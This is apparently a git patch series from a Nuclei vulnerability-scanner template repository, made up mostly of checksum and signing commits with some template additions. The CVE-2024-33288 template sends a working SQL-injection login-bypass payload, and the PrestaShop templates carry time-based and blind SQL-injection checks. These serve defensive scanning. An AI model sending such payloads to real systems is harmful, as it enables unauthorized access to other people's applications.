+45,4 @@ http: part: body words: - "19833-2202-EVC" -# digest: 4a0a00473045022100f22344f29260306acf31af5a7c61265f388bbd61bf8ad8e96f065030814ca986022035526b485b24e7be4616c64d3b5be9e9abd37bdbe893ca3ca0027058e83ff4c9:922c64590222798bb761d5b6d8e72950 +# digest: 4a0a004730450220463f0c1d447513c69079b7f58a07d158405b058efb1e70a43cd3d08ab170875b022100b7e623399aedd2ebfae7b507b9a2b8c756b4a26e4decc54486d72e32770775cd:922c64590222798bb761d5b6d8e72950 \ No newline at end of file From 003239fa7fb00dbb85cd062299b9560d1c523f12 Mon Sep 17 00:00:00 2001 From: GitHub Action <action@github.com> Date: Thu, 16 May 2024 05:44:23 +0000 Subject: [PATCH 1095/1768] Auto Generated Templates Checksum [Thu May 16 05:44:23 UTC 2024] :robot: --- templates-checksum.txt | 6 +++--- 1 file changed, 3 insertions(+), 3 deletions(-) diff --git a/templates-checksum.txt b/templates-checksum.txt index 7766f5a9c3..7d99e9b8d7 100644 --- a/templates-checksum.txt +++ b/templates-checksum.txt @@ -1171,7 +1171,7 @@ http/cves/2015/CVE-2015-2196.yaml:41c3025eda3b296fadb3afb70e9f44ab5e855a86 http/cves/2015/CVE-2015-2755.yaml:153c44d93a107d184876d575101a5e3bae6ade75 http/cves/2015/CVE-2015-2794.yaml:22fea2657bd50593544f2ea1d4e1e61f7044f541 http/cves/2015/CVE-2015-2807.yaml:a32104390b45df0c648be1124edd91b81a398bd8 -http/cves/2015/CVE-2015-2863.yaml:ec18b83f753cde2e1efedc78605d4609de00b044 +http/cves/2015/CVE-2015-2863.yaml:e886adc4ab34cbe416003b6df1df1e2143034e1c http/cves/2015/CVE-2015-2996.yaml:4a148288d459b04645da3f50f3d5ed9f2a569fe9 http/cves/2015/CVE-2015-3035.yaml:7e9bcc2539eee69c097358692a1fb05cec8af353 http/cves/2015/CVE-2015-3224.yaml:c3fa9504f5cba20a3037356578c60c6599bf4218 @@ -2713,7 +2713,7 @@ http/cves/2022/CVE-2022-32771.yaml:03f39391c095a08e62741ce113c743f4517b8823 http/cves/2022/CVE-2022-32772.yaml:da27806050d52e5cac3989730b256c6f4509314c http/cves/2022/CVE-2022-33119.yaml:ff5573e49a471b38a8309236950429441246dfab http/cves/2022/CVE-2022-33174.yaml:fdf252755679cf8edbb5d3bd76a2e3318c38b703 -http/cves/2022/CVE-2022-33891.yaml:7f018c89e7ae99be6d89f1fe0f774bf743a734dc +http/cves/2022/CVE-2022-33891.yaml:be15239c35fe6650ca82d85b304b20132ea20b4e http/cves/2022/CVE-2022-33901.yaml:ad281903ad2b3a9d2612e85fd9668f248e915a8b http/cves/2022/CVE-2022-33965.yaml:3739b3179daf3df8780e204c3eb4c3b981cf15d6 http/cves/2022/CVE-2022-34045.yaml:3db1aeeb2d125c974bf12bbcfa88b3011d00093d @@ -8539,7 +8539,7 @@ ssl/tls-version.yaml:4e40f08efbb39172b9280ea9e26ca5f0a14a575a ssl/untrusted-root-certificate.yaml:a91d36990a1d052f5ee64d170ad8f084d38dab19 ssl/weak-cipher-suites.yaml:62fe808d9dfafda67c410e6cb9445fdc70257e89 ssl/wildcard-tls.yaml:d244f62c7bd22d3868fc6fc7cb9550af6b261210 -templates-checksum.txt:42fdaf7e590824421c1c010924196a338fe81a1f +templates-checksum.txt:25bd19e132c2fce0b56fadd4f103873df3529fea wappalyzer-mapping.yml:7f03bd65baacac20c1dc6bbf35ff2407959574f1 workflows/74cms-workflow.yaml:bb010e767ad32b906153e36ea618be545b4e22d0 workflows/acrolinx-workflow.yaml:8434089bb55dec3d7b2ebc6a6f340e73382dd0c4 From 7298f614886ba09431b9b59388b5afd846306f38 Mon Sep 17 00:00:00 2001 From: GitHub Action <action@github.com> Date: Thu, 16 May 2024 05:46:07 +0000 Subject: [PATCH 1096/1768] Auto Template Signing [Thu May 16 05:46:07 UTC 2024] :robot: --- http/cves/2015/CVE-2015-2863.yaml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/http/cves/2015/CVE-2015-2863.yaml b/http/cves/2015/CVE-2015-2863.yaml index b0ac2537b4..15283777a9 100644 --- a/http/cves/2015/CVE-2015-2863.yaml +++ b/http/cves/2015/CVE-2015-2863.yaml @@ -40,4 +40,4 @@ http: part: header regex: - '(?m)^(?:Location\s*?:\s*?)(?:https?:\/\/|\/\/|\/\\\\|\/\\)(?:[a-zA-Z0-9\-_\.@]*)oast\.me\/?(\/|[^.].*)?$' # https://regex101.com/r/idfD2e/1 -# digest: 4a0a00473045022033fc40b6ad2baca8ef5a0faf48a297f8e14cac8e720047cf1fe5e96fcc10f293022100cf0c442e4cdd4914c177d6a54eb4d2115d579e4fe66231ee6dab3b91118d424a:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a0046304402204d2a37c6eb68a653c40afd87277f8343eb3e10c0bdd4316cd611f7ebc1e852ba022079d43910950fd7200f43f450956b7541df0fe79b603c2941ddc6ac3e7a2bb177:922c64590222798bb761d5b6d8e72950 \ No newline at end of file From dc650a0dd3764cfd523009c66f4ae15d9c311d92 Mon Sep 17 00:00:00 2001 From: Ritik Chaddha <44563978+ritikchaddha@users.noreply.github.com> Date: Thu, 16 May 2024 13:17:03 +0530 Subject: [PATCH 1097/1768] Update imgproxy-unauth.yaml --- http/misconfiguration/imgproxy-unauth.yaml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/http/misconfiguration/imgproxy-unauth.yaml b/http/misconfiguration/imgproxy-unauth.yaml index c2f8e5d113..4816d4045c 100644 --- a/http/misconfiguration/imgproxy-unauth.yaml +++ b/http/misconfiguration/imgproxy-unauth.yaml @@ -3,7 +3,7 @@ id: imgproxy-unauth info: name: Imgproxy Unauthorized Access author: userdehghani - severity: high + severity: low description: | imgproxy is a fast and secure standalone server for resizing, processing, and converting images. remediation: set IMGPROXY_SECRET environment variable. From 5fd0a4c24e1f39e11a694a565432fefaae5efab7 Mon Sep 17 00:00:00 2001 From: GitHub Action <action@github.com> Date: Thu, 16 May 2024 07:48:39 +0000 Subject: [PATCH 1099/1768] Auto Generated Templates Checksum [Thu May 16 07:48:39 UTC 2024] :robot: --- templates-checksum.txt | 6 +++--- 1 file changed, 3 insertions(+), 3 deletions(-) diff --git a/templates-checksum.txt b/templates-checksum.txt index 7d99e9b8d7..a519f39ddc 100644 --- a/templates-checksum.txt +++ b/templates-checksum.txt @@ -201,7 +201,7 @@ dast/vulnerabilities/csti/angular-client-side-template-injection.yaml:a76f2f0b28 dast/vulnerabilities/lfi/lfi-keyed.yaml:366e7b0c3bdef023427815022e64ed88b6e1d3d5 dast/vulnerabilities/lfi/linux-lfi-fuzz.yaml:71bfad9f7132086665db55b8c5aeeee3adf23d89 dast/vulnerabilities/lfi/windows-lfi-fuzz.yaml:f3663bb5ab092b4fc1e69998c2d92d64312dc57f -dast/vulnerabilities/redirect/open-redirect.yaml:0e16729d72a4b492267144a21d378c118dd38195 +dast/vulnerabilities/redirect/open-redirect.yaml:fe71f239a2fa403c11e86a54ec0f5685020f43bf dast/vulnerabilities/rfi/generic-rfi.yaml:ac4f9582d4d9b7930d28dbc0f21eede8df760507 dast/vulnerabilities/sqli/sqli-error-based.yaml:ab3efe10b425fed28b569a88fd149d7e7ac706df dast/vulnerabilities/ssrf/blind-ssrf.yaml:83027f4642aeaf84e49f09fc876ff91d6002f3af @@ -1171,7 +1171,7 @@ http/cves/2015/CVE-2015-2196.yaml:41c3025eda3b296fadb3afb70e9f44ab5e855a86 http/cves/2015/CVE-2015-2755.yaml:153c44d93a107d184876d575101a5e3bae6ade75 http/cves/2015/CVE-2015-2794.yaml:22fea2657bd50593544f2ea1d4e1e61f7044f541 http/cves/2015/CVE-2015-2807.yaml:a32104390b45df0c648be1124edd91b81a398bd8 -http/cves/2015/CVE-2015-2863.yaml:e886adc4ab34cbe416003b6df1df1e2143034e1c +http/cves/2015/CVE-2015-2863.yaml:94f9d4de683bd0f7ed17d5cf945e89a3af50fd0f http/cves/2015/CVE-2015-2996.yaml:4a148288d459b04645da3f50f3d5ed9f2a569fe9 http/cves/2015/CVE-2015-3035.yaml:7e9bcc2539eee69c097358692a1fb05cec8af353 http/cves/2015/CVE-2015-3224.yaml:c3fa9504f5cba20a3037356578c60c6599bf4218 @@ -8539,7 +8539,7 @@ ssl/tls-version.yaml:4e40f08efbb39172b9280ea9e26ca5f0a14a575a ssl/untrusted-root-certificate.yaml:a91d36990a1d052f5ee64d170ad8f084d38dab19 ssl/weak-cipher-suites.yaml:62fe808d9dfafda67c410e6cb9445fdc70257e89 ssl/wildcard-tls.yaml:d244f62c7bd22d3868fc6fc7cb9550af6b261210 -templates-checksum.txt:25bd19e132c2fce0b56fadd4f103873df3529fea +templates-checksum.txt:4cfa9d7c34a68646e25c38e6844c2f4bb42ef473 wappalyzer-mapping.yml:7f03bd65baacac20c1dc6bbf35ff2407959574f1 workflows/74cms-workflow.yaml:bb010e767ad32b906153e36ea618be545b4e22d0 workflows/acrolinx-workflow.yaml:8434089bb55dec3d7b2ebc6a6f340e73382dd0c4 From cc6d313f0b7ce917a61fdefc9c5f418fa29cb1a3 Mon Sep 17 00:00:00 2001 From: GitHub Action <action@github.com> Date: Thu, 16 May 2024 07:50:18 +0000 Subject: [PATCH 1100/1768] Auto Template Signing [Thu May 16 07:50:18 UTC 2024] :robot: --- dast/vulnerabilities/redirect/open-redirect.yaml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/dast/vulnerabilities/redirect/open-redirect.yaml b/dast/vulnerabilities/redirect/open-redirect.yaml index e0ed92d112..8c36036bcc 100644 --- a/dast/vulnerabilities/redirect/open-redirect.yaml +++ b/dast/vulnerabilities/redirect/open-redirect.yaml @@ -179,4 +179,4 @@ http: - 301 - 302 - 307 -# digest: 4a0a004730450221009817b3fc85a64de37095f99e9bc9606b18a5a9ee3273af0405634e1b2760458c02201a1430837a69b1a03bece85a3966c0042aaddc52f45baedb9191e95936860b0c:922c64590222798bb761d5b6d8e72950 +# digest: 4b0a00483046022100e9bf67056b260dc2bc0f200f2d1853287f4f9b916a9a10f53fc7e643868df3200221008daacf7355ba1c40d34b672e78c096110e60601fdd1afa5932cd69b109c27d18:922c64590222798bb761d5b6d8e72950 \ No newline at end of file From 8d0a62b2c3ea27260eea60427b9b972b4f331eaa Mon Sep 17 00:00:00 2001 From: Kazgangap <halilkirazkaya@yandex.com> Date: Thu, 16 May 2024 11:56:24 +0300 Subject: [PATCH 1101/1768] cve-2024-33288 --- http/cves/2024/CVE-2024-33288.yaml | 34 ++++++++++++++++++++++++++++++ 1 file changed, 34 insertions(+) create mode 100644 http/cves/2024/CVE-2024-33288.yaml diff --git a/http/cves/2024/CVE-2024-33288.yaml b/http/cves/2024/CVE-2024-33288.yaml new file mode 100644 index 0000000000..2a6cc0471b --- /dev/null +++ b/http/cves/2024/CVE-2024-33288.yaml @@ -0,0 +1,34 @@ +id: CVE-2024-33288 +info: + name: Prison Management System - SQL Injection Authentication Bypass + author: Kazgangap + severity: high + description: Sql injection vulnerability was found on the login page in Prison Management System + reference: + - https://en.0day.today/exploit/39610 + - https://www.sourcecodester.com/sql/17287/prison-management-system.html + tags: cms,cve2024,sqli + +http: + - raw: + - | + POST /prison/Admin/login.php HTTP/1.1 + Host: {{Hostname}} + Content-Type: application/x-www-form-urlencoded + + txtusername=admin%27+or+%271%27+%3D%271&txtpassword=nuclei&btnlogin= + + - | + GET /prison/Admin/index.php HTTP/1.1 + Host: {{Hostname}} + + matchers-condition: and + matchers: + - type: word + words: + - "<p>Change Password</p>" + - "<p>Logout</p>" + + - type: status + status: + - 200 \ No newline at end of file From 9c78200d038e039b125c7ae3ec0b14df2026a69a Mon Sep 17 00:00:00 2001 From: Kazgangap <halilkirazkaya@yandex.com> Date: Thu, 16 May 2024 12:02:21 +0300 Subject: [PATCH 1102/1768] path fix --- http/cves/2024/CVE-2024-33288.yaml | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/http/cves/2024/CVE-2024-33288.yaml b/http/cves/2024/CVE-2024-33288.yaml index 2a6cc0471b..581e8dd222 100644 --- a/http/cves/2024/CVE-2024-33288.yaml +++ b/http/cves/2024/CVE-2024-33288.yaml @@ -12,14 +12,14 @@ info: http: - raw: - | - POST /prison/Admin/login.php HTTP/1.1 + POST /Admin/login.php HTTP/1.1 Host: {{Hostname}} Content-Type: application/x-www-form-urlencoded txtusername=admin%27+or+%271%27+%3D%271&txtpassword=nuclei&btnlogin= - | - GET /prison/Admin/index.php HTTP/1.1 + GET /Admin/index.php HTTP/1.1 Host: {{Hostname}} matchers-condition: and From aafbc61a00db5400ff72294dc4f0a262f74d3a1b Mon Sep 17 00:00:00 2001 From: Kazgangap <halilkirazkaya@yandex.com> Date: Thu, 16 May 2024 13:29:53 +0300 Subject: [PATCH 1103/1768] add cve 2023 6065 --- http/cves/2023/CVE-2023-6065.yaml | 42 +++++++++++++++++++++++++++++++ 1 file changed, 42 insertions(+) create mode 100644 http/cves/2023/CVE-2023-6065.yaml diff --git a/http/cves/2023/CVE-2023-6065.yaml b/http/cves/2023/CVE-2023-6065.yaml new file mode 100644 index 0000000000..a5af699ce8 --- /dev/null +++ b/http/cves/2023/CVE-2023-6065.yaml @@ -0,0 +1,42 @@ +id: CVE-2023-6065 + +info: + name: Quttera Web Malware Scanner <= 3.4.1.48 - Sensitive Data Exposure + author: Kazgangap + severity: medium + description: | + The Quttera Web Malware Scanner WordPress plugin before 3.4.2.1 doesn't restrict access to detailed scan logs, which allows a malicious actor to discover local paths and portions of the site's code + reference: + - https://nvd.nist.gov/vuln/detail/CVE-2023-6065 + - https://wpscan.com/vulnerability/64f2557f-c5e4-4779-9e28-911dfaf2dda5 + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N + cvss-score: 5.3 + cve-id: CVE-2023-6065 + epss-score: 0.00046 + epss-percentile: 0.16179 + cpe: cpe:2.3:a:quttera:quttera_web_malware_scanner:*:*:*:*:*:wordpress:*:* + metadata: + vendor: quttera + product: quttera_web_malware_scanner + framework: wordpress + tags: wpscan,cve2023,wp-plugin,quttera + +http: + - method: GET + path: + - "{{BaseURL}}/wp-content/plugins/quttera-web-malware-scanner/quttera_wp_report.txt" + + matchers-condition: and + matchers: + - type: word + words: + - "Website Malware Scan Report" + - "Scanned Website" + - "Scan type" + part: body + condition: and + + - type: status + status: + - 200 \ No newline at end of file From 376015ed53564934a2e8ebaf25c20ee9f4246d21 Mon Sep 17 00:00:00 2001 From: Ritik Chaddha <44563978+ritikchaddha@users.noreply.github.com> Date: Thu, 16 May 2024 17:01:52 +0530 Subject: [PATCH 1104/1768] Update CVE-2022-22897.yaml --- http/cves/2022/CVE-2022-22897.yaml | 24 +++++++++++++----------- 1 file changed, 13 insertions(+), 11 deletions(-) diff --git a/http/cves/2022/CVE-2022-22897.yaml b/http/cves/2022/CVE-2022-22897.yaml index 2b4c3ad515..3be9b98bc9 100644 --- a/http/cves/2022/CVE-2022-22897.yaml +++ b/http/cves/2022/CVE-2022-22897.yaml @@ -1,7 +1,7 @@ id: CVE-2022-22897 info: - name: PrestaShop Ap Pagebuilder <= 2.4.4 SQL Injection + name: PrestaShop AP Pagebuilder <= 2.4.4 - SQL Injection author: mastercho severity: critical description: | @@ -60,14 +60,8 @@ http: X-Requested-With: XMLHttpRequest leoajax=1&product_one_img=-{{rand_int(0000, 9999)}}) OR 6643=6644-- yMwI - extractors: - - type: regex - name: version - part: body_1 - internal: true - group: 1 - regex: - - "<version>\\s*<!\\[CDATA\\[(.*?)\\]\\]>\\s*<\\/version>" + + matchers-condition: or matchers: - type: dsl name: time-based @@ -76,7 +70,6 @@ http: - 'status_code_1 == 200 && compare_versions(version, "<= 2.4.4")' condition: and - - type: dsl name: blind-based dsl: @@ -84,4 +77,13 @@ http: - 'contains(body_3, "content") && contains(body_3, "{{Hostname}}")' - '!contains(body_4, "content") && !contains(body_4, "{{Hostname}}")' - 'len(body_3) > 200 && len(body_4) <= 22' - condition: and \ No newline at end of file + condition: and + + extractors: + - type: regex + name: version + part: body_1 + internal: true + group: 1 + regex: + - "<version>\\s*<!\\[CDATA\\[(.*?)\\]\\]>\\s*<\\/version>" From 97b9ba58412b02c31083c7e201d183c37b287239 Mon Sep 17 00:00:00 2001 From: Prince Chaddha <prince@projectdiscovery.io> Date: Thu, 16 May 2024 17:03:44 +0530 Subject: [PATCH 1105/1768] Update mixed-active-content.yaml --- http/misconfiguration/mixed-active-content.yaml | 6 ------ 1 file changed, 6 deletions(-) diff --git a/http/misconfiguration/mixed-active-content.yaml b/http/misconfiguration/mixed-active-content.yaml index 0f36c83b53..f80aab518a 100644 --- a/http/misconfiguration/mixed-active-content.yaml +++ b/http/misconfiguration/mixed-active-content.yaml @@ -28,12 +28,6 @@ http: part: body negative: true regex: - # There are some sites which download scripts using an unencrypted connection (e.g. http://html5shiv.googlecode.com/svn/trunk/html5.js) - # to the users of old browsers. - # - # This rule filters such sites (even if the site contains other scripts downloaded using an unencrypted connection) to decrease the number - # of false positives. If you have an idea how to filter out only such scripts (and detect if the same site serves another script using - # http:// to all users) feel free to replace the rule. - "(?mi)<!--\\[if lt IE [0-9]*\\]>\\s*<script src=\"http://" - type: regex From b8851471233ac16ab743c3efc6db5452e3ca7ca8 Mon Sep 17 00:00:00 2001 From: GitHub Action <action@github.com> Date: Thu, 16 May 2024 11:35:44 +0000 Subject: [PATCH 1107/1768] Auto Generated Templates Checksum [Thu May 16 11:35:44 UTC 2024] :robot: --- templates-checksum.txt | 6 +++--- 1 file changed, 3 insertions(+), 3 deletions(-) diff --git a/templates-checksum.txt b/templates-checksum.txt index a519f39ddc..5f2695754c 100644 --- a/templates-checksum.txt +++ b/templates-checksum.txt @@ -201,7 +201,7 @@ dast/vulnerabilities/csti/angular-client-side-template-injection.yaml:a76f2f0b28 dast/vulnerabilities/lfi/lfi-keyed.yaml:366e7b0c3bdef023427815022e64ed88b6e1d3d5 dast/vulnerabilities/lfi/linux-lfi-fuzz.yaml:71bfad9f7132086665db55b8c5aeeee3adf23d89 dast/vulnerabilities/lfi/windows-lfi-fuzz.yaml:f3663bb5ab092b4fc1e69998c2d92d64312dc57f -dast/vulnerabilities/redirect/open-redirect.yaml:fe71f239a2fa403c11e86a54ec0f5685020f43bf +dast/vulnerabilities/redirect/open-redirect.yaml:3896789898155f3b800c7179806f6cdc6e750ee6 dast/vulnerabilities/rfi/generic-rfi.yaml:ac4f9582d4d9b7930d28dbc0f21eede8df760507 dast/vulnerabilities/sqli/sqli-error-based.yaml:ab3efe10b425fed28b569a88fd149d7e7ac706df dast/vulnerabilities/ssrf/blind-ssrf.yaml:83027f4642aeaf84e49f09fc876ff91d6002f3af @@ -5532,7 +5532,7 @@ http/misconfiguration/mingyu-xmlrpc-sock-adduser.yaml:d680c0d1f329ae9d5f114cf4ac http/misconfiguration/misconfigured-concrete5.yaml:d56475cb0edd78cf18150ac40eba183c0a201d7d http/misconfiguration/misconfigured-docker.yaml:ca18899f575d3f7df82e3a33e2a9b4b0f75582ef http/misconfiguration/missing-sri.yaml:1bc66d65f6b661a47fc8925571630064bbcd8e40 -http/misconfiguration/mixed-active-content.yaml:1a958c89b06668be58457e142802ce450ec76e33 +http/misconfiguration/mixed-active-content.yaml:36e4dd04c2d8609e7c894c58b91c1338d7f95387 http/misconfiguration/mixed-passive-content.yaml:58ad91895597b997aadc184d4489f699e8b886dc http/misconfiguration/mlflow-unauth.yaml:b4493ff237b1e91ad2445c6d48b5908294501c08 http/misconfiguration/mobiproxy-dashboard.yaml:4d76a953ef877f0847e2722091d679b905023cc8 @@ -8539,7 +8539,7 @@ ssl/tls-version.yaml:4e40f08efbb39172b9280ea9e26ca5f0a14a575a ssl/untrusted-root-certificate.yaml:a91d36990a1d052f5ee64d170ad8f084d38dab19 ssl/weak-cipher-suites.yaml:62fe808d9dfafda67c410e6cb9445fdc70257e89 ssl/wildcard-tls.yaml:d244f62c7bd22d3868fc6fc7cb9550af6b261210 -templates-checksum.txt:4cfa9d7c34a68646e25c38e6844c2f4bb42ef473 +templates-checksum.txt:4ade96c1c0d1f0240c55940d0e2e01261f255a0f wappalyzer-mapping.yml:7f03bd65baacac20c1dc6bbf35ff2407959574f1 workflows/74cms-workflow.yaml:bb010e767ad32b906153e36ea618be545b4e22d0 workflows/acrolinx-workflow.yaml:8434089bb55dec3d7b2ebc6a6f340e73382dd0c4 From ebfd00e083133f00024652cf3bd44265a4f5074f Mon Sep 17 00:00:00 2001 From: GitHub Action <action@github.com> Date: Thu, 16 May 2024 11:37:27 +0000 Subject: [PATCH 1108/1768] Auto Template Signing [Thu May 16 11:37:27 UTC 2024] :robot: --- http/misconfiguration/mixed-active-content.yaml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/http/misconfiguration/mixed-active-content.yaml b/http/misconfiguration/mixed-active-content.yaml index f80aab518a..74bcc5d873 100644 --- a/http/misconfiguration/mixed-active-content.yaml +++ b/http/misconfiguration/mixed-active-content.yaml @@ -49,4 +49,4 @@ http: - "<script[^>]*src=['\"](http[^s'\">][^'\">]*)['\"]" - "<iframe[^>]*src=['\"](http[^s'\">][^'\">]*)['\"]" - "<object[^>]*data=['\"](http[^s'\">][^'\">]*)['\"]" -# digest: 490a0046304402206da84b39f7171acdcb806ade774850286919e63b2628ec34cc1e808c55a50bc4022018d956b267ea58eac95a3c718ccb8706453332cb853e89eb235cd7775c4cdfa5:922c64590222798bb761d5b6d8e72950 +# digest: 490a00463044022071351cac7771373802b705ea74cc8edd9b9be04149b88d1db971b1cf7750d7a9022071c782b36b8dc9cc820ab0f2ea1483a86b1ac8f2351c811c24c5c8dfb84ebfaf:922c64590222798bb761d5b6d8e72950 \ No newline at end of file From cf0d9955b3e881117ecf260116665dd3bcaac381 Mon Sep 17 00:00:00 2001 From: Ritik Chaddha <44563978+ritikchaddha@users.noreply.github.com> Date: Thu, 16 May 2024 17:08:52 +0530 Subject: [PATCH 1109/1768] Update CVE-2023-46347.yaml --- http/cves/2023/CVE-2023-46347.yaml | 12 ++++++------ 1 file changed, 6 insertions(+), 6 deletions(-) diff --git a/http/cves/2023/CVE-2023-46347.yaml b/http/cves/2023/CVE-2023-46347.yaml index 7a9a3cacbe..ff780a2261 100644 --- a/http/cves/2023/CVE-2023-46347.yaml +++ b/http/cves/2023/CVE-2023-46347.yaml @@ -1,4 +1,4 @@ -id: CVE-2023-46347 +id: CVE-2023-46347 info: name: PrestaShop Step by Step products Pack - SQL Injection @@ -12,7 +12,7 @@ info: classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H cvss-score: 9.8 - cve-id: CVE-2023-46347 + cve-id: CVE-2023-46347 cwe-id: CWE-89 epss-score: 0.00076 epss-percentile: 0.31923 @@ -39,7 +39,7 @@ http: matchers: - type: dsl dsl: - - duration>=6 - - contains(content_type, "text/html") - - contains(header, 'PrestaShop') - condition: and \ No newline at end of file + - 'duration>=6' + - 'contains(content_type, "text/html")' + - 'contains(header, "PrestaShop")' + condition: and From 9604c8e294f4e2a28f35e3ea9f4e9f32cc5e2006 Mon Sep 17 00:00:00 2001 From: Ritik Chaddha <44563978+ritikchaddha@users.noreply.github.com> Date: Thu, 16 May 2024 17:14:06 +0530 Subject: [PATCH 1110/1768] lint fix --- http/cves/2023/CVE-2023-46347.yaml | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/http/cves/2023/CVE-2023-46347.yaml b/http/cves/2023/CVE-2023-46347.yaml index 31b06c109a..257b83cf73 100644 --- a/http/cves/2023/CVE-2023-46347.yaml +++ b/http/cves/2023/CVE-2023-46347.yaml @@ -12,7 +12,7 @@ info: classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H cvss-score: 9.8 - cve-id: CVE-2023-46347 + cve-id: CVE-2023-46347 cwe-id: CWE-89 epss-score: 0.00076 epss-percentile: 0.31923 @@ -43,4 +43,4 @@ http: - 'contains(content_type, "text/html")' - 'contains(header, "PrestaShop")' condition: and -# digest: 4b0a00483046022100b87838fd7d263c207e34f1457465b2f00642af421684161d37081d4b8ad0413b022100f379548beef0caf23301dc7d71e0a9d46c803654f1815f49a1c4d8838bc7761e:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100b87838fd7d263c207e34f1457465b2f00642af421684161d37081d4b8ad0413b022100f379548beef0caf23301dc7d71e0a9d46c803654f1815f49a1c4d8838bc7761e:922c64590222798bb761d5b6d8e72950 From 4c098184f574370e1691886c15340162f96ce6dc Mon Sep 17 00:00:00 2001 From: Dhiyaneshwaran <leedhiyanesh@gmail.com> Date: Thu, 16 May 2024 21:45:15 +0530 Subject: [PATCH 1111/1768] minor update --- http/cves/2023/CVE-2023-6065.yaml | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/http/cves/2023/CVE-2023-6065.yaml b/http/cves/2023/CVE-2023-6065.yaml index a5af699ce8..dc145e56a6 100644 --- a/http/cves/2023/CVE-2023-6065.yaml +++ b/http/cves/2023/CVE-2023-6065.yaml @@ -36,7 +36,7 @@ http: - "Scan type" part: body condition: and - + - type: status status: - - 200 \ No newline at end of file + - 200 From 06f33856ace97dcac94fbe186ea5286717db5b06 Mon Sep 17 00:00:00 2001 From: dcruzec <charles.dcruze@gmail.com> Date: Thu, 16 May 2024 14:03:14 -0400 Subject: [PATCH 1112/1768] Add files via upload submitting a pull request for vrealize hyperic login panel. --- .../vrealize-hyperic-login-panel.yaml | 30 +++++++++++++++++++ 1 file changed, 30 insertions(+) create mode 100644 http/exposed-panels/vrealize-hyperic-login-panel.yaml diff --git a/http/exposed-panels/vrealize-hyperic-login-panel.yaml b/http/exposed-panels/vrealize-hyperic-login-panel.yaml new file mode 100644 index 0000000000..eb56e21586 --- /dev/null +++ b/http/exposed-panels/vrealize-hyperic-login-panel.yaml @@ -0,0 +1,30 @@ +id: vrealize-hyperic-login-panel + +info: + name: vRealize Hyperic Login Panel - Detect + author: Charles D. + severity: info + description: vRealize Hyperic login panel was detected + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N + cwe-id: CWE-200 + metadata: + max-request: 1 + shodan-query: http.title:"Sign In - Hyperic" + tags: login,panel,vrealize-hyperic + +http: + - method: GET + path: + - '{{BaseURL}}/app/login' + + matchers-condition: and + matchers: + - type: word + words: + - "Sign In - Hyperic" + part: body + + - type: status + status: + - 200 \ No newline at end of file From 08018959c027ea65784e16ab673ad9085a3e3921 Mon Sep 17 00:00:00 2001 From: "[PDBot]" <bot@projectdiscovery.io> Date: Fri, 17 May 2024 07:39:08 +0000 Subject: [PATCH 1113/1768] Auto Generated New Template Addition List [Fri May 17 07:39:08 UTC 2024] :robot: --- .new-additions | 1 + 1 file changed, 1 insertion(+) diff --git a/.new-additions b/.new-additions index 903417746e..b4b4cc93eb 100644 --- a/.new-additions +++ b/.new-additions @@ -27,6 +27,7 @@ http/misconfiguration/installer/custom-xoops-installer.yaml http/misconfiguration/installer/froxlor-installer.yaml http/misconfiguration/installer/moosocial-installer.yaml http/misconfiguration/installer/phpmyfaq-installer.yaml +http/misconfiguration/installer/trilium-notes-installer.yaml http/misconfiguration/unigui-server-monitor-exposure.yaml http/technologies/apache/apache-answer-detect.yaml http/technologies/boa-web-server.yaml From 6feeb4f5ee9e663422580bf1bfece876c2b5c977 Mon Sep 17 00:00:00 2001 From: GitHub Action <action@github.com> Date: Fri, 17 May 2024 07:39:13 +0000 Subject: [PATCH 1114/1768] Auto Generated Templates Checksum [Fri May 17 07:39:13 UTC 2024] :robot: --- templates-checksum.txt | 5 +++-- 1 file changed, 3 insertions(+), 2 deletions(-) diff --git a/templates-checksum.txt b/templates-checksum.txt index 5f2695754c..7ea32eef24 100644 --- a/templates-checksum.txt +++ b/templates-checksum.txt @@ -5473,6 +5473,7 @@ http/misconfiguration/installer/tasmota-install.yaml:f77cc6de67828f45e5d0e528f77 http/misconfiguration/installer/tautulli-install.yaml:babc01a81e184ecadb2cc433e7b0cdcc1195eb8b http/misconfiguration/installer/testrail-install.yaml:ffd3e6d389e273255f6e6b97ef617680c3336895 http/misconfiguration/installer/tiny-rss-installer.yaml:fffe28f654914f0e91b3afe7aeecd942d1fb1705 +http/misconfiguration/installer/trilium-notes-installer.yaml:30f3e838a3e50cf800ac21ebb8c33cbad2b8d7f6 http/misconfiguration/installer/turbo-website-installer.yaml:c860118d4335fffd299c32c8ccfd503ece02fd94 http/misconfiguration/installer/typo3-installer.yaml:316fc6ce687dbbdde1d1fe5bbff8b7224c7ed4d1 http/misconfiguration/installer/umbraco-installer.yaml:468d300c5078cf4f972eabf51e9452bcdc8ffbb4 @@ -5532,7 +5533,7 @@ http/misconfiguration/mingyu-xmlrpc-sock-adduser.yaml:d680c0d1f329ae9d5f114cf4ac http/misconfiguration/misconfigured-concrete5.yaml:d56475cb0edd78cf18150ac40eba183c0a201d7d http/misconfiguration/misconfigured-docker.yaml:ca18899f575d3f7df82e3a33e2a9b4b0f75582ef http/misconfiguration/missing-sri.yaml:1bc66d65f6b661a47fc8925571630064bbcd8e40 -http/misconfiguration/mixed-active-content.yaml:36e4dd04c2d8609e7c894c58b91c1338d7f95387 +http/misconfiguration/mixed-active-content.yaml:488f8534a4929b8deb745780feea319f8d9decbd http/misconfiguration/mixed-passive-content.yaml:58ad91895597b997aadc184d4489f699e8b886dc http/misconfiguration/mlflow-unauth.yaml:b4493ff237b1e91ad2445c6d48b5908294501c08 